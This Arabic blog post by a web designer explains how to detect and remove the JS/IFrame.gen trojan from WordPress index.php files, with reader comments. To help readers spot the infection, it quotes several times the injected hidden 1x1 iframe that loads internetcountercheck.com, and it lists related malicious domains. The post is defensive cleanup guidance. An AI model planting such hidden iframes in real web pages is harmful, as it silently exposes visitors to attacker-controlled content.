Hide this notice

مرحبا أنت تستخدم انترنت اكسبلورر ٦ و هو متصفح اصدر في العام 2001 الا يبدو لك ذلك قديما .

نحن ننصحك بقوة بترقية متصفحك إلى نسخة أحدث مثل أنترنت اكسيلورر ٨ أو فايرفوكس و الذي سيتيح لك تصفح أفضل ليس لموقعنا فقط بل في كل أرجاء الأنترنت..

لو كنت لا تريد أو لا تملك الصلاحية لترقية المتصفح يمكنك أن تستمر في التصفح على الرحب و السعة لكن تذكر قد لا تتمكن من استعراض بعض خدمات الموقع بالشكل المطلوب . بالطبع يمكنك إخفاء هذه الرسالة و تستمر في التصفح و لن تظهر لك هذه الرسالة مرة أخرى .

Post Pic

تروجان JS/IFrame.gen و مدونات وردبريس

تروجان يزرع في مدونات وردبريس بدأ يظهر و ينتشر بشكل سريع ليس خطير و لكنه مزعج و يؤثر على مصداقية الموقع . سأشرح قصتي معه و كيف تغلبت عليه و كيف يمكنك التغلب عليه .. هيا إلى المعركة ..

قبل أن اتحدث عن  الموضوعات التقنية دعوني أخبركم كيف تم لقاءنا الأول أنا و هذا التروجان Trojan  . أحد العملاء أرسل لي أن زوار موقعه يشكون من وجود تروجان في الموقع و ان برنامج الحماية يحذرهم منه .

iframe01

اجريت بحث عن التورجان و بحثت في شفرة المصدر للموقع ووجدت السطر التالي


<iframe src=”http://internetcountercheck.com/?click=xxxxxxx” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

قمت بتفتيش النسخة الأصلية من الموقع و الموجود على السيرفر الخاص و لم أجد أثر للفايروس  و لم أكن املك الوقت لمراجعة جميع الملفات فقمت بتركيب نسخة جديدة و نظيفة من الورد بريس و حلت المشكلة و لله الحمد .

و من ثم كان اللقاء الثاني .. أحد متابعي على تويتر ارسل التالي

iframe02

و هذا يجعل القارئ يعتقد أني من اضيف هذه التروجان للمواقع و راجعت جميع المواقع و لم اجد إلا صفحة واحدة في الموقع السابق و مدونة أخرى أما المواقع التي أديرها انا كانت سليمة و نظيفة و هكذا استبعدت ان يكون جهازي مصدر هذه التروجان لانها من باب اولى انتشرت في مواقعي أنا و التي استخدمها و أزورها بشكل أكبر  خاصة اني من مستخدمي الماك و نحن نعرف كيف أن الماك الأقل من حيث التروجان و الفايروسات .

و هذا جعلني أجري بحث أكبر حوله و اسبابه و التالي هو خلاصة ما وصلت له .. لعل و عسى أحد ما يستفيد ..

ما هي الملفات المصابة ؟

في الغالب ملفات الفهرس  index.phpو هي  :

  • ملف الفهرس الرئيسي لوردبريس index.php
  • ملف الفهرس لمجلد  wp-admin  و هو index.php.
  • ملف الفهرس لكل القوالب index.php  سواء القالب الذي تستخدمه أو اي قالب آخر موجود على السيرفر.
  • قد تكون هناك ملفات آخرى لكن هذا ما وجدته في المواقع التي قمت بتنظيفها و هذا ما قرأته في أغلب المصادر.

كيف حدث ذلك ؟

أن كنت تعتقد انك تعرضت للآختراق فليس بالضرورة هذا هو السبب و على الأرجح ليس هو السبب

١- الأستضافة

احتمال آخر قد يكون ان السيرفر الذي يستضيف موفعك تعرض لهجوم أو أصيب و متى ما اصيب موقع واحد على السيرفر أصيبت باقي المواقع .

٢- أنت

نعم أنت أو اي من مستخدمي الموقع على الأرجح هناك دودة   Warm في جهازك تستخدم برنامج Ftp    لزرع هذه الشفرات في ملفاتك و رفعها .فهي بشكل ما تقرأ كلمة المرور الخاصة بك و تستخدمها .

٣- أنت ايضا

قد لا تكون تستخدم الاف تي بي على جهازك لكن قد تستخدم واجهة وردبريس لرفع الموضوعات و الصور و هي طريقة اخرى  لنقل العدوى .

كيف أعرف ان كان موقعي مصاب ؟

لو لم تكن تملك برنامج للحماية من الفايروسات . زر موقعك و افتح الشفرة المصدرية استخدم خاصية البحث فهي أفضل و ابحث عن iframe  . في الغالب الشفرة تأخذ الشكل التالي و تكون في نهاية الصفحة .


<iframe src=”http://xxxxxxxxxx.com/?click=xxxxxxx” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

حيث تعبر xxxxx عن قيم مختلفة لمواقع مختلفة .

كيف أعالج الوضع ؟

  • افحص جهازك و ازل التروجان لو كان موجودا .
  • لديك احد الخيارين أما تحميل نسخة نظيفة من الورد بريس و نسخة نظيفة من القالب
  • أو
  • فتح الملفات  المصابة و التي ذكرتها في الأعلى و إزالة السطر

<iframe src=”http://internetcountercheck.com/?click=xxxxxxx” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

  • و الذي ستجده في نهاية الملف .
  • بعض المصادر تفضل أن تقوم بتغيرات كل كلمات المرور  مثل ftpو السي بانيل و الدخول لوردبريس خاصة أن وجدت أن جهازك مصاب .

هل سيتأثر ترتيبي في جوجل و محركات البحث الأخرى ؟

كن سريعا و سريعا جدا  حتى لا تظهر جوجل رسالة بجانب موقعك تحذر منه للـتأكد من تصنيفك أمنيا في جوجل استخدم الوصلة التالية بدل عنوان مدونتي بعنوان الموقع الذي تريد التأكد منه .

http://www.google.com/safebrowsing/diagnostic?site=http://qatardr.net

معلومات إضافية

النافذة   iframe  قد تشير لأحد المواقع التالية :

  • internetcountercheck.com
  • peskostruikaz .com
  • hosttracker .net
  • nipkelo .net
  • deisvop .net
  • live-counter .net
  • klaomta .com
  • ibalefo .net
  • xtrarobotz .com
  • thedeadpit .com
  • webexperience13 .com
  • durnosy .com
  • goooogleadsence .biz
  • vafuiek .com
  • google-ana1yticz .com
  • bukirda .com
  • hostverify .net
  • hotslotpot.cn/in .cgi
  • nipkelo .net
  • nyoflak .com
  • sefauro .net
  • beidzan .com

وصلات

و أخيرا .. حكمة اليوم

  • اللي يعيش ياما  يشوف .. و اللي ما يحدث مدونته يستاهل .

بقلم : فاطمة العمادي

أم و زوجة .. مصممة حرة و مصورة .. عرف الناس كتاباتي التقنية من خلال شخصية خيالية هي الدكتور نت . اصمم المواقع منذ العام ١٩٩٩م .

أوسمة : , , ,

تعليقات الزوار (8)

[+] أضف تعليقك من فضلك



  1. Hisham Sadek كتب:

    غالباً ما رأيت مثل تلك المشكلة بسبب الاستضافة تحديداً فللأسف هناك استضافات سيئة جداً و لا يتم حمايتها أو التأكد من وجود ملفات مصابة كل فترة من مقدم الخدمة بالإضافة إلى تركز تلك المشكلة في الاستضافات المشتركة التي تقدم مساحات كبيرة جداً بأسعار قليلة مثل Servage و مازال لي معها تجربة و للأسف أصبحت سيئة جداً في الحماية ..

    و الجزء الآخر يتعلق بثقافة صاحب الموقع و ضرورة وعيه بأن يستخدم Antivirus جيد و ليس كل ما يظهر للناس فجأة و يحدث ضجة فهو الأفضل و لكن يجب البحث عن آراء الخبراء مثل CNET Reviews التي تعتبر الأفضل من حيث جميع البرامج أو المنتجات التقنية, بالإضافة إلى ضرورة فهم أنه يجب التوقف بقدر الإمكان عن استخدام الكراك و الباتش للبرامج و البحث عن بدائل مجانية أفضل ..


  2. محمد كتب:

    اللهم السلامة..
    فقط كإضافة، أحيانا يكون الحاسب سليما وكذلك الإستضافة، لكن يضطر الشخص للإتصال بمدونته من مقاهي نت، وهذه الأخيرة قد لا تكون نظيفة كفاية، لذلك وجب أخذ الحيطة والحذر من المقاهي خصوصا مع بيانات الدخول..


  3. abdallh كتب:

    بارك الله فيكم على التنبيه والشرح

    اعجبتني الحكمة كثيرا :)


  4. بالفعل أخي

    انا صاحب منتدى و لم أسلم منه ..

    و فعلت كل شئ كما قلت

    مشكور


  5. يعطيك العافيه فاطمه ,,
    <>
    أهم شي حكمة اليوم D:


  6. شكرا علي المعلومات الجيدة


  7. بيكسنت كتب:

    موضوع متميز وشرح ممتاز . تحياتى